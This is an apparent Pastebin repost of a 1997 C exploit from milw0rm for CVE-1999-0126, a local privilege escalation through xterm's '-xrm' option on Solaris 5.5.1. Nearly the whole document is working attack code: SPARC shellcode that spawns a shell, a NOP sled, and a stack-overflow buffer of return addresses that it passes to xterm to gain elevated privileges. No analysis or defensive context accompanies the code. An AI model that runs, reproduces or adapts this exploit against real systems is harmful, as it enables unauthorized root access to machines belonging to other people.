Advertisement
FlyFar

Solaris 5.5.1 X11R6.3 - xterm '-xrm' Local Privilege Escalation - CVE-1999-0126

May 17th, 2024
623
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.41 KB | Cybersecurity | 0 0
  1. /*
  2.  * X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97
  3.  *
  4.  */
  5.  
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8. #include <sys/types.h>
  9. #include <unistd.h>
  10.  
  11. #define EXTRA2 1300
  12. #define BUF_LENGTH 400
  13. #define EXTRA 500
  14.    /* Need an addr such that contents of addr+0xe98 = 0 */
  15. #define SAFE_ADDR ((unsigned)0xefff2008)
  16. #define STACK_OFFSET 0x4800
  17. #define SPARC_NOP 0xa61cc013
  18.  
  19. u_long sparc_shellcode[] =
  20. {
  21.     0x2d0bd89a, /* sethi  %hi(0x2f626800), %l6  */
  22.     0xac15a16e, /* or  %l6, 0x16e, %l6          */
  23.     0x2f0bdadc, /* sethi  %hi(0x2f6b7000), %l7  */
  24.     0xae15e368, /* or  %l7, 0x368, %l7          */
  25.     0x900b800e, /* and  %sp, %sp, %o0           */
  26.     0x9203a00c, /* add  %sp, 0xc, %o1           */
  27.     0x941ac00b, /* xor  %o3, %o3, %o2           */
  28.     0x9c03a014, /* add  %sp, 0x14, %sp          */
  29.     0xec3bbfec, /* std  %l6, [ %sp + -20 ]      */
  30.     0xc023bff4, /* clr  [ %sp + -12 ]           */
  31.     0xdc23bff8, /* st  %sp, [ %sp + -8 ]        */
  32.     0xc023bffc, /* clr  [ %sp + -4 ]            */
  33.     0x8210203b, /* mov  0x3b, %g1               */
  34.     0x91d02008, /* ta  8                        */
  35.     0xffffffff, /* illegal                      */
  36. };
  37.  
  38. u_long get_sp(void)
  39. {
  40.     asm("mov %sp,%i0 \n");
  41. }
  42.  
  43. char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
  44. char longvar[0x4000] = "BLAH=";
  45.  
  46. void main(int argc, char *argv[])
  47. {
  48.     char *env[2];
  49.     unsigned long targ_addr;
  50.     u_long *long_p;
  51.     int i, code_length = sizeof(sparc_shellcode),dso=0;
  52.  
  53.     if(argc > 1) dso=atoi(argv[1]);
  54.  
  55.     long_p =(u_long *) buf;
  56.  
  57.     for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
  58.         *long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
  59.  
  60.     targ_addr = get_sp() - STACK_OFFSET - dso;
  61.     for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  62.         *long_p++ = SPARC_NOP;
  63.  
  64.     for (i = 0; i < code_length / sizeof(u_long); i++)
  65.         *long_p++ = sparc_shellcode[i];
  66.  
  67.     for (i = 0; i < EXTRA / sizeof(u_long); i++)
  68.         *long_p++ = targ_addr;
  69.  
  70.     printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  71.            targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  72.  
  73.     /* This is just to shove the stack down a bit */
  74.     memset(&longvar[5], 'a', sizeof longvar-6);
  75.     longvar[sizeof longvar -1] = '\0';
  76.     env[0] = longvar;
  77.     env[1] = NULL;
  78.  
  79.     execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
  80.     perror("execl failed");
  81. }
  82.  
  83. // milw0rm.com [1997-05-28]
  84.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement